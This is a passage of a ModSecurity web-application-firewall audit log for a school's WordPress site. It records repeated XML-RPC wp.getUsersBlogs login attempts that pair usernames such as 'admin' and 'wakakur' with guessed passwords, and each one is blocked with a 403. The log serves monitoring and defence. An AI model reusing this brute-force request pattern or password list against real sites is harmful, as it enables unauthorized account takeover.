Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 217
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--43b0493f-C--
wp.getUsersBlogs
admin
killer
--43b0493f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--43b0493f-E--
--43b0493f-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (61+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745512321994083 18027 (- - -)
Stopwatch2: 1745512321994083 18027; combined=28413, p1=540, p2=3539, p3=0, p4=0, p5=12184, sr=91, sw=80, l=0, gc=12070
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--43b0493f-Z--
--930d3f02-A--
[24/Apr/2025:23:33:08 +0700] aApnxN5yz20UX9VrdZO0sgAAAFU 103.236.140.4 47048 103.236.140.4 8181
--930d3f02-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 218
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--930d3f02-C--
wp.getUsersBlogs
admin
rebecca
--930d3f02-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--930d3f02-E--
--930d3f02-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (100+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745512388828002 6397 (- - -)
Stopwatch2: 1745512388828002 6397; combined=4459, p1=545, p2=3734, p3=0, p4=0, p5=104, sr=92, sw=76, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--930d3f02-Z--
--ab633f0c-A--
[24/Apr/2025:23:34:08 +0700] aApoAN5yz20UX9VrdZO1bwAAAEQ 103.236.140.4 50858 103.236.140.4 8181
--ab633f0c-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--ab633f0c-C--
wp.getUsersBlogs
admin
simpsons
--ab633f0c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ab633f0c-E--
--ab633f0c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (92+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745512448322813 5205 (- - -)
Stopwatch2: 1745512448322813 5205; combined=3726, p1=457, p2=3091, p3=0, p4=0, p5=104, sr=87, sw=74, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ab633f0c-Z--
--9591ad62-A--
[24/Apr/2025:23:35:08 +0700] aApoPN5yz20UX9VrdZO2TQAAAFI 103.236.140.4 54276 103.236.140.4 8181
--9591ad62-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--9591ad62-C--
wp.getUsersBlogs
wakakur
r007p455w0rd
--9591ad62-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9591ad62-E--
--9591ad62-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (78+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745512508183649 5574 (- - -)
Stopwatch2: 1745512508183649 5574; combined=3998, p1=448, p2=3353, p3=0, p4=0, p5=113, sr=94, sw=84, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9591ad62-Z--
--7e0fd018-A--
[24/Apr/2025:23:36:08 +0700] aApoePiVYlyO1xhz7yOd4QAAANE 103.236.140.4 58012 103.236.140.4 8181
--7e0fd018-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--7e0fd018-C--
wp.getUsersBlogs
wakakur
wakakur1990
--7e0fd018-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7e0fd018-E--
--7e0fd018-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (80+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745512568025675 5861 (- - -)
Stopwatch2: 1745512568025675 5861; combined=4134, p1=527, p2=3392, p3=0, p4=0, p5=126, sr=91, sw=89, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7e0fd018-Z--
--3be4200c-A--
[24/Apr/2025:23:37:08 +0700] aApotGLuk3f9kLjsdTZzFgAAAI8 103.236.140.4 33456 103.236.140.4 8181
--3be4200c-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 226
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--3be4200c-C--
wp.getUsersBlogs
wakakur
Marketing2024
--3be4200c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3be4200c-E--
--3be4200c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (68+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745512628204310 5192 (- - -)
Stopwatch2: 1745512628204310 5192; combined=3696, p1=427, p2=3092, p3=0, p4=0, p5=105, sr=92, sw=72, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3be4200c-Z--
--aae3e95c-A--
[24/Apr/2025:23:38:08 +0700] aApo8MlQo524fhbIj1x1UQAAABE 103.236.140.4 37170 103.236.140.4 8181
--aae3e95c-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 222
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--aae3e95c-C--
wp.getUsersBlogs
wakakur
abc123456
--aae3e95c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--aae3e95c-E--
--aae3e95c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (91+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745512688646286 4439 (- - -)
Stopwatch2: 1745512688646286 4439; combined=3120, p1=387, p2=2587, p3=0, p4=0, p5=85, sr=74, sw=61, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--aae3e95c-Z--
--0d0a9f07-A--
[24/Apr/2025:23:39:08 +0700] aAppLN5yz20UX9VrdZO5owAAAEE 103.236.140.4 40958 103.236.140.4 8181
--0d0a9f07-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 222
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--0d0a9f07-C--
wp.getUsersBlogs
wakakur
pass@word
--0d0a9f07-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0d0a9f07-E--
--0d0a9f07-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (105+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745512748001329 4902 (- - -)
Stopwatch2: 1745512748001329 4902; combined=3746, p1=442, p2=3131, p3=0, p4=0, p5=102, sr=90, sw=71, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0d0a9f07-Z--
--4d2e8d42-A--
[24/Apr/2025:23:40:08 +0700] aAppaN5yz20UX9VrdZO64AAAAEI 103.236.140.4 44754 103.236.140.4 8181
--4d2e8d42-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--4d2e8d42-C--
wp.getUsersBlogs
wakakur
codeword
--4d2e8d42-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4d2e8d42-E--
--4d2e8d42-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (103+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745512808052657 4826 (- - -)
Stopwatch2: 1745512808052657 4826; combined=3391, p1=406, p2=2827, p3=0, p4=0, p5=92, sr=76, sw=66, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4d2e8d42-Z--
--a2848844-A--
[24/Apr/2025:23:41:15 +0700] aAppq95yz20UX9VrdZO8CAAAAE4 103.236.140.4 49122 103.236.140.4 8181
--a2848844-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 218
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--a2848844-C--
wp.getUsersBlogs
wakakur
passw
--a2848844-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a2848844-E--
--a2848844-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (94+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745512875504207 5199 (- - -)
Stopwatch2: 1745512875504207 5199; combined=3561, p1=397, p2=2993, p3=0, p4=0, p5=98, sr=73, sw=73, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a2848844-Z--
--9ab75457-A--
[24/Apr/2025:23:41:32 +0700] aAppvMlQo524fhbIj1x4NwAAAAk 103.236.140.4 50170 103.236.140.4 8181
--9ab75457-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--9ab75457-C--
wp.getUsersBlogs
wakakur
1234%^&*
--9ab75457-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9ab75457-E--
--9ab75457-H--
Message: XML parser error: XML: Failed parsing document.
Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745512892452220 4668 (- - -)
Stopwatch2: 1745512892452220 4668; combined=3173, p1=384, p2=2631, p3=0, p4=0, p5=96, sr=79, sw=62, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9ab75457-Z--
--13966911-A--
[24/Apr/2025:23:42:15 +0700] aApp5_iVYlyO1xhz7yOkbQAAAMI 103.236.140.4 52956 103.236.140.4 8181
--13966911-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 220
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--13966911-C--
wp.getUsersBlogs
wakakur
chelsea
--13966911-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--13966911-E--
--13966911-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (121+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745512935022781 3769 (- - -)
Stopwatch2: 1745512935022781 3769; combined=2579, p1=331, p2=2080, p3=0, p4=0, p5=95, sr=61, sw=73, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--13966911-Z--
--34989a02-A--
[24/Apr/2025:23:43:15 +0700] aApqI_iVYlyO1xhz7yOlYgAAAMk 103.236.140.4 56906 103.236.140.4 8181
--34989a02-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--34989a02-C--
wp.getUsersBlogs
wakakur
20100728
--34989a02-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--34989a02-E--
--34989a02-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (116+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745512995555345 5483 (- - -)
Stopwatch2: 1745512995555345 5483; combined=3813, p1=412, p2=3200, p3=0, p4=0, p5=115, sr=83, sw=86, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--34989a02-Z--
--31a9e97a-A--
[24/Apr/2025:23:44:15 +0700] aApqX8lQo524fhbIj1x7hwAAAAk 103.236.140.4 60418 103.236.140.4 8181
--31a9e97a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 220
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--31a9e97a-C--
wp.getUsersBlogs
wakakur
cowboys
--31a9e97a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--31a9e97a-E--
--31a9e97a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (72+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745513055354716 4121 (- - -)
Stopwatch2: 1745513055354716 4121; combined=2957, p1=369, p2=2446, p3=0, p4=0, p5=84, sr=70, sw=58, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--31a9e97a-Z--
--c24ea707-A--
[24/Apr/2025:23:45:15 +0700] aApqm2Luk3f9kLjsdTZ6YgAAAIE 103.236.140.4 36104 103.236.140.4 8181
--c24ea707-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--c24ea707-C--
wp.getUsersBlogs
wakakur
nikita
--c24ea707-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c24ea707-E--
--c24ea707-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (117+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745513115795144 5144 (- - -)
Stopwatch2: 1745513115795144 5144; combined=3858, p1=467, p2=3191, p3=0, p4=0, p5=115, sr=88, sw=85, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c24ea707-Z--
--cf365027-A--
[24/Apr/2025:23:46:16 +0700] aApq2PiVYlyO1xhz7yOoeAAAAMk 103.236.140.4 39892 103.236.140.4 8181
--cf365027-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 238
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--cf365027-C--
wp.getUsersBlogs
wakahumas
wordpress_administrator
--cf365027-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--cf365027-E--
--cf365027-H--
